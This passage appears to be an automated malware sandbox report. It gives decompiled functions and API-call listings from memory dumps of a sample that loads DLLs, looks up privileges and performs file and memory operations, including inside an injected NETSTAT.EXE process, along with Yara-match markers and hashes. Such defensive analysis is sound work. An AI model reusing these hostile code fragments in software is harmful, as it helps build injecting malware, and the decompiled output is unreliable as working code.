								LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
								_t18 = _v12;
							}
							return _t18;
						} else {
							return _t23;
						}
					}
				}
			}

















                                                                                                                          0x0040acb3
                                                                                                                          0x0040acb3
                                                                                                                          0x0040acb6
                                                                                                                          0x0040acb8
                                                                                                                          0x0040acba
                                                                                                                          0x0040acba
                                                                                                                          0x0040acbb
                                                                                                                          0x0040ad06
                                                                                                                          0x0040ad06
                                                                                                                          0x0040ad07
                                                                                                                          0x0040ad09
                                                                                                                          0x0040ad09
                                                                                                                          0x0040ad09
                                                                                                                          0x00000000
                                                                                                                          0x0040acbd
                                                                                                                          0x0040acbd
                                                                                                                          0x0040ad0b
                                                                                                                          0x0040ad0b
                                                                                                                          0x00000000
                                                                                                                          0x0040acbf
                                                                                                                          0x0040acbf
                                                                                                                          0x0040acc0
                                                                                                                          0x0040acc1
                                                                                                                          0x0040acdc
                                                                                                                          0x0040acdf
                                                                                                                          0x0040ace4
                                                                                                                          0x0040ace9
                                                                                                                          0x0040acf3
                                                                                                                          0x0040acf8
                                                                                                                          0x0040acfb
                                                                                                                          0x0040acfd
                                                                                                                          0x0040acff
                                                                                                                          0x0040ad05
                                                                                                                          0x00000000
                                                                                                                          0x0040ad05
                                                                                                                          0x0040ad0d
                                                                                                                          0x0040ad11
                                                                                                                          0x0040ad19
                                                                                                                          0x0040ad1c
                                                                                                                          0x0040ad1e
                                                                                                                          0x0040ad32
                                                                                                                          0x0040ad34
                                                                                                                          0x0040ad34
                                                                                                                          0x0040ad3a
                                                                                                                          0x0040aceb
                                                                                                                          0x0040acee
                                                                                                                          0x0040acee
                                                                                                                          0x0040ace9
                                                                                                                          0x0040acbd

                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 6a1883fa3df364d00ab308787177eaaa5395b6c117eefb219030bb0774dce5ec
                                                                                                                          • Instruction ID: 8eb2301004882bfed2658affd43f0a5eeaebbd990e514aec3a06f004a3f8bdd8
                                                                                                                          • Opcode Fuzzy Hash: 6a1883fa3df364d00ab308787177eaaa5395b6c117eefb219030bb0774dce5ec
                                                                                                                          • Instruction Fuzzy Hash: 2201D875D4020DABCF10DBA4D881FDD77B5EF44318F1082EAE9099B251F235D65ACB42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E0040ACC0(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t17;
				intOrPtr _t19;
				struct _OBJDIR_INFORMATION _t20;
				signed int _t25;
				signed int* _t29;

				_v8 =  &_v536;
				_t17 = E0041C810( &_v12, 0x104, _a8);
				if(_t17 != 0) {
					_t19 = E0041CC30(__eflags, _v8);
					__eflags = _t19;
					if(_t19 != 0) {
						_t29 =  &_v12;
						_t25 = E0041CEB0(_t29, 0);
						asm("cmpsb");
						 *_t29 =  *_t29 & _t25;
						_t7 = __ebx + 0x558b08c4;
						 *_t7 =  *((intOrPtr*)(__ebx + 0x558b08c4)) + _t25;
						__eflags =  *_t7;
						asm("les ecx, [eax]");
					}
					_t20 = E0041B060(_v8);
					_v16 = _t20;
					__eflags = _t20;
					if(_t20 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t20;
				} else {
					return _t17;
				}
			}












                                                                                                                          0x0040acdc
                                                                                                                          0x0040acdf
                                                                                                                          0x0040ace9
                                                                                                                          0x0040acf3
                                                                                                                          0x0040acfb
                                                                                                                          0x0040acfd
                                                                                                                          0x0040acff
                                                                                                                          0x0040ad05
                                                                                                                          0x0040ad06
                                                                                                                          0x0040ad07
                                                                                                                          0x0040ad09
                                                                                                                          0x0040ad09
                                                                                                                          0x0040ad09
                                                                                                                          0x0040ad0b
                                                                                                                          0x0040ad0b
                                                                                                                          0x0040ad11
                                                                                                                          0x0040ad19
                                                                                                                          0x0040ad1c
                                                                                                                          0x0040ad1e
                                                                                                                          0x0040ad32
                                                                                                                          0x00000000
                                                                                                                          0x0040ad34
                                                                                                                          0x0040ad3a
                                                                                                                          0x0040acee
                                                                                                                          0x0040acee
                                                                                                                          0x0040acee

                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                                                                                          • Instruction ID: f2ae6e5e7806921c9eae43ef0be609edf832a6aa20f0d9e7e2e66c408c20611a
                                                                                                                          • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                                                                                          • Instruction Fuzzy Hash: E40152B5D4020DABDB10DAE1DC82FDEB7789B14308F0041AAA908A7281F634EB54CB95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A262, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 19%
                                                                                                                          			E0041A262(void* __eax, void* __ecx, void* _a1, int _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v0;
				void* _v1;
				signed char _t15;
				signed char _t24;
				void* _t32;
				signed char* _t33;

				_t24 = __ecx - 1;
				asm("fisub word [ebx+esi*8]");
				_t15 = _t24;
				asm("les edi, [edx+0x1b]");
				asm("fcomp3 st6");
				if(_t24 >= 0) {
					_push(_t32);
					_t20 = _v0;
					_push(_t33);
					_t33 = _v0 + 0xc7c;
					E0041AB20(_t32, _t20, _t33,  *((intOrPtr*)(_t20 + 0xa14)), 0, 0x36);
					_t28 = _a4;
					_t15 =  *_t33;
					ExitProcess(_a4);
				}
				 *((intOrPtr*)(__eax - 0x75)) =  *((intOrPtr*)(__eax - 0x75)) - _t28;
				return  *( *_t33)(_a12, _a16, _a20, _a24, _a28, _a32, __eax, _t15 & 0x00000052);
			}









                                                                                                                          0x0041a262
                                                                                                                          0x0041a263
                                                                                                                          0x0041a266
                                                                                                                          0x0041a267
                                                                                                                          0x0041a26a
                                                                                                                          0x0041a26c
                                                                                                                          0x0041a26e
                                                                                                                          0x0041a273
                                                                                                                          0x0041a27c
                                                                                                                          0x0041a282
                                                                                                                          0x0041a28a
                                                                                                                          0x0041a28f
                                                                                                                          0x0041a292
                                                                                                                          0x0041a298
                                                                                                                          0x0041a298
                                                                                                                          0x0041a2d2
                                                                                                                          0x0041a2f8

                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: 4abe985106a79419cf1ec235fbccd1ea9952f58f99598e9530d47a1ee41f35d9
                                                                                                                          • Instruction ID: a7fe49d223b48750c27ab17b1d12878145246f7a98e041d23e66a3874a00bc26
                                                                                                                          • Opcode Fuzzy Hash: 4abe985106a79419cf1ec235fbccd1ea9952f58f99598e9530d47a1ee41f35d9
                                                                                                                          • Instruction Fuzzy Hash: A2018BB6200108ABC714DF98DC84EEB73ADEF88300F10815DBA5C9B642C634EA12CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A381, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 30%
                                                                                                                          			E0041A381(void* __edx, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				void* _v117;
				signed int _t8;
				void* _t11;
				int _t17;
				intOrPtr* _t18;
				void* _t25;

				_push(cs);
				_t11 = (_t8 | 0x00000060) - 0xca695158;
				asm("wait");
				if(_t11 > 0) {
					return  *_t18(_t11, __edx, cs);
				} else {
					_t14 = _v0;
					E0041AB20(_t25, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t14 + 0xa18)), 0, 0x46);
					_t17 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
					return _t17;
				}
			}










                                                                                                                          0x0041a382
                                                                                                                          0x0041a385
                                                                                                                          0x0041a38a
                                                                                                                          0x0041a38b
                                                                                                                          0x0041a400
                                                                                                                          0x0041a38d
                                                                                                                          0x0041a393
                                                                                                                          0x0041a3aa
                                                                                                                          0x0041a3c0
                                                                                                                          0x0041a3c4
                                                                                                                          0x0041a3c4

                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: 9469479746c1abb94035fb50c7da2de63c6e60b7007db871f5e55df9f7e952b6
                                                                                                                          • Instruction ID: 62cc6e4f7d922e68cfd5948dcaec3ae9cc405c55fcfe40af2c058d69eb1ce2bb
                                                                                                                          • Opcode Fuzzy Hash: 9469479746c1abb94035fb50c7da2de63c6e60b7007db871f5e55df9f7e952b6
                                                                                                                          • Instruction Fuzzy Hash: 2AF0BEB12001483BDA10EF689C86EEB3B6ADF84764F018196FD1D97202CA35E95187B5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A230, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A230(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AB20(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                          0x0041a23f
                                                                                                                          0x0041a247
                                                                                                                          0x0041a25d
                                                                                                                          0x0041a261

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                          • Instruction ID: 9eb97300d5e10087c94d33d02e30a743291ab6cce32cf35ae9b88dc6f9268b02
                                                                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                          • Instruction Fuzzy Hash: 0EE01AB12002046BD714DF59DC45EA777ADAF88754F014559BA0857241C630F910CAB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A390, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A390(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AB20(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                          0x0041a3aa
                                                                                                                          0x0041a3c0
                                                                                                                          0x0041a3c4

                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                          • Instruction ID: bf4187e38ed515452a76a24d05e88418ebf87a1f9c5c0c5d517d21230e680a96
                                                                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                          • Instruction Fuzzy Hash: DEE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934F8108BF5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A270, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A270(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AB20(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                          0x0041a273
                                                                                                                          0x0041a28a
                                                                                                                          0x0041a298

                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                          • Instruction ID: 654422823446a6dc42c61fec1171b68ac592b5503343b56bfda4b4a103558910
                                                                                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                          • Instruction Fuzzy Hash: 1FD017726042187BD620EB99DC85FD777ADDF487A4F0180AABA1C6B242C531BA10CBE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A5967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 58ae18251e286a487975354e091e46602f0bdb9aa7d09d2dc58ea3121462084e
                                                                                                                          • Instruction ID: 945a714f111609a382a60f3185fa051e5cbae16d842d86037fbe94dd3358aa8b
                                                                                                                          • Opcode Fuzzy Hash: 58ae18251e286a487975354e091e46602f0bdb9aa7d09d2dc58ea3121462084e
                                                                                                                          • Instruction Fuzzy Hash: 9CB09B71D014C5D5D711D7714608717795077D0741F16C061D1020681B4778C495F5B6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 00AAFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E00AAFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                          0x00aafdda
                                                                                                                          0x00aafde2
                                                                                                                          0x00aafde5
                                                                                                                          0x00aafdec
                                                                                                                          0x00aafdfa
                                                                                                                          0x00aafdff
                                                                                                                          0x00aafe0a
                                                                                                                          0x00aafe0f
                                                                                                                          0x00aafe17
                                                                                                                          0x00aafe1e
                                                                                                                          0x00aafe19
                                                                                                                          0x00aafe19
                                                                                                                          0x00aafe19
                                                                                                                          0x00aafe20
                                                                                                                          0x00aafe21
                                                                                                                          0x00aafe22
                                                                                                                          0x00aafe25
                                                                                                                          0x00aafe40

                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AAFDFA
                                                                                                                          Strings
                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00AAFE2B
                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00AAFE01
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                          • API String ID: 885266447-3903918235
                                                                                                                          • Opcode ID: 8450b5c59ca4d8497f15a1edff2d2e58d60486d0c398ff573a9e38aa778ce993
                                                                                                                          • Instruction ID: 910e455111a69d8b8af75ac2cc0b27ebdce503809dccb35f03805d19378c1c70
                                                                                                                          • Opcode Fuzzy Hash: 8450b5c59ca4d8497f15a1edff2d2e58d60486d0c398ff573a9e38aa778ce993
                                                                                                                          • Instruction Fuzzy Hash: 39F0F632600601BFEA241A95DD06F37BF6AEB45730F240715F628565E1EA62F82097F4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Analysis Process: NETSTAT.EXE PID: 5948 Parent PID: 3440 NETSTAT.EXECOMMON

                                                                                                                          Executed Functions

                                                                                                                          Function 02369F74, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02364B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02364B77,007A002E,00000000,00000060,00000000,00000000), ref: 02369F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                          • Opcode ID: 83e15d0d1536b05d97b01dc0a6296594f924e01e243923ca3195c2d783ebab47
                                                                                                                          • Instruction ID: 1c2f18b85be975aea4d31c7ec3fbc4ca2de84104aad20580a0c7545da8bbe6e0
                                                                                                                          • Opcode Fuzzy Hash: 83e15d0d1536b05d97b01dc0a6296594f924e01e243923ca3195c2d783ebab47
                                                                                                                          • Instruction Fuzzy Hash: B801B2B2204108AFCB18CF98DC95EEB37EEAF8C754F158649BA1DD7251C630E811CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02369F1A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02364B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02364B77,007A002E,00000000,00000060,00000000,00000000), ref: 02369F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                          • Opcode ID: 40b7c4121765085cce412e3b304e513b3eb0290636f74b43cd85688f8fcaf1f7
                                                                                                                          • Instruction ID: fa593bc785d8c519b81054e9fde2e8a504708331436d641b75914fbf909b0e41
                                                                                                                          • Opcode Fuzzy Hash: 40b7c4121765085cce412e3b304e513b3eb0290636f74b43cd85688f8fcaf1f7
                                                                                                                          • Instruction Fuzzy Hash: 5701B2B2205108AFDB18CF98DC95EEB37AEAF8C754F158648FA1DD7240C630EC118BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02369F20, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02364B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02364B77,007A002E,00000000,00000060,00000000,00000000), ref: 02369F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                          • Instruction ID: 0de7e2c667fc447deed346ebef47bfad4fd5347776cace7e935ef42584aed8a8
                                                                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                          • Instruction Fuzzy Hash: DAF0B2B2200208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0236A04A, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(02364D10,?,?,02364D10,00000000,FFFFFFFF), ref: 0236A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: 253c5ad76745aedc14c6557aaf28ef044f9e8d0b7a0466cd19501b4d5afdb99b
                                                                                                                          • Instruction ID: 9c81dff3819a720ebc71eacbdea7a318cd00aa31f1c045c0e0bdebcf3f0848e4
                                                                                                                          • Opcode Fuzzy Hash: 253c5ad76745aedc14c6557aaf28ef044f9e8d0b7a0466cd19501b4d5afdb99b
                                                                                                                          • Instruction Fuzzy Hash: 93F05476200214AFD710EF98DC44EA777ADEF8C310F148559FA589B241C631E91587E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02369FCB, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(02364D32,5EB6522D,FFFFFFFF,023649F1,?,?,02364D32,?,023649F1,FFFFFFFF,5EB6522D,02364D32,?,00000000), ref: 0236A015
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: e5acad5a1eddc461ee6f34251e3c72b1aa7f1d2ecebcdd1ba6ebf93cfc014c02
                                                                                                                          • Instruction ID: 21d7173b808e232ad8aa72db40f89494a165b38779d51464a84d93db047b1376
                                                                                                                          • Opcode Fuzzy Hash: e5acad5a1eddc461ee6f34251e3c72b1aa7f1d2ecebcdd1ba6ebf93cfc014c02
                                                                                                                          • Instruction Fuzzy Hash: 0EF0EC71200104ABDB14DF99DC50EEB77ADEF8C754F118249BE1DA7241D631E811CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02369FD0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(02364D32,5EB6522D,FFFFFFFF,023649F1,?,?,02364D32,?,023649F1,FFFFFFFF,5EB6522D,02364D32,?,00000000), ref: 0236A015
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                          • Instruction ID: 1b1cbfe4ffc283bcb158ae8ff46097095451a0f7f42ff9e5cfdb4f0faea5207b
                                                                                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                          • Instruction Fuzzy Hash: F7F0A4B2200208ABCB14DF89DC94EEB77ADAF8C754F158249BA1DA7241D630E8118BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0236A100, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02352D11,00002000,00003000,00000004), ref: 0236A139
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2167126740-0
                                                                                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                          • Instruction ID: d5224d23e433f57fb32ecd5b08a1aeb0169b006f4ff93efaa871f8b95f95c941
                                                                                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                          • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC90EAB77ADAF88750F118149BE08A7241C630F810CBE4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0236A050, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(02364D10,?,?,02364D10,00000000,FFFFFFFF), ref: 0236A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
